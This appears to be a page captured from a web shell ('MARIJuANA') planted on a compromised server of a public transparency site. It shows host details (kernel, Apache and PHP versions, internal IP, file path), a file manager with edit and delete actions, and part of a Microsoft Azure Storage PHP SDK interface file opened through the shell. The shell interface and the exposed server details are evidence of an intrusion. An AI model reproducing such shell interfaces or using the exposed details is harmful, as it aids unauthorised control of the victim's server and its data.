MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/guajeru/transparencia/assets/ckfinder/core/connector/php/vendor/microsoft/azure-storage/src/Table/Internal/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
AcceptOptionTrait.php 2.017 KB -rw-r--r-- 2021-07-19 13:06 R E G D
IMimeReaderWriter.php 1.983 KB -rw-r--r-- 2021-07-19 13:06 R E G D
IODataReaderWriter.php 2.669 KB -rw-r--r-- 2021-07-19 13:06 R E G D
ITable.php 22.287 KB -rw-r--r-- 2021-07-19 13:06 R E G D
JsonODataReaderWriter.php 6.762 KB -rw-r--r-- 2021-07-19 13:06 R E G D
MimeReaderWriter.php 4.502 KB -rw-r--r-- 2021-07-19 13:06 R E G D
REQUEST EXIT
* @copyright 2016 Microsoft Corporation * @license https://github.com/azure/azure-storage-php/LICENSE * @link https://github.com/azure/azure-storage-php */ namespace MicrosoftAzure\Storage\Table\Internal; use MicrosoftAzure\Storage\Table\Models as TableModels; use MicrosoftAzure\Storage\Common\Models\ServiceProperties; use MicrosoftAzure\Storage\Common\Models\ServiceOptions; use MicrosoftAzure\Storage\Common\Models\GetServiceStats; /** * This interface has all REST APIs provided by Windows Azure for Table service. * * @ignore * @category Microsoft * @package MicrosoftAzure\Storage\Table\Internal * @author Azure Storage PHP SDK * @copyright 2016 Microsoft Corporation * @license https://github.com/azure/azure-storage-php/LICENSE * @link https://github.com/azure/azure-storage-php * @see http://msdn.microsoft.com/en-us/library/windowsazure/dd179423.aspx */ interface ITable { /** * Gets the properties of the service. * * @param ServiceOptions $options optional table service options. * * @return \MicrosoftAzure\Storage\Common\Models\GetServicePropertiesResult * * @see http://msdn.microsoft.com/en-us/library/windowsazure/hh452238.aspx */ public function getServiceProperties( ServiceOptions $options = null ); /** * Creates promise to get the properties of the service. * * @param ServiceOptions $options optional table service options. * * @return \GuzzleHttp\Promise\PromiseInterface * * @see http://msdn.microsoft.com/en-us/library/windowsazure/hh452238.aspx */ public function getServicePropertiesAsync( ServiceOptions $options = null ); /** * Sets the properties of the service. * * @param ServiceProperties $serviceProperties new service properties * @param ServiceOptions $options optional parameters * * @return void * * @see http://msdn.microsoft.com/en-us/library/windowsazure/hh452240.aspx */ public function setServiceProperties( ServiceProperties $serviceProperties, ServiceOptions $options = null ); /** * Creates promise to set the properties of the service. * * It's recommended to use getServiceProperties, alter the returned object and * then use setServiceProperties with this altered object. * * @param ServiceProperties $serviceProperties new service properties * @param ServiceOptions $options optional parameters * * @return \GuzzleHttp\Promise\PromiseInterface * * @see http://msdn.microsoft.com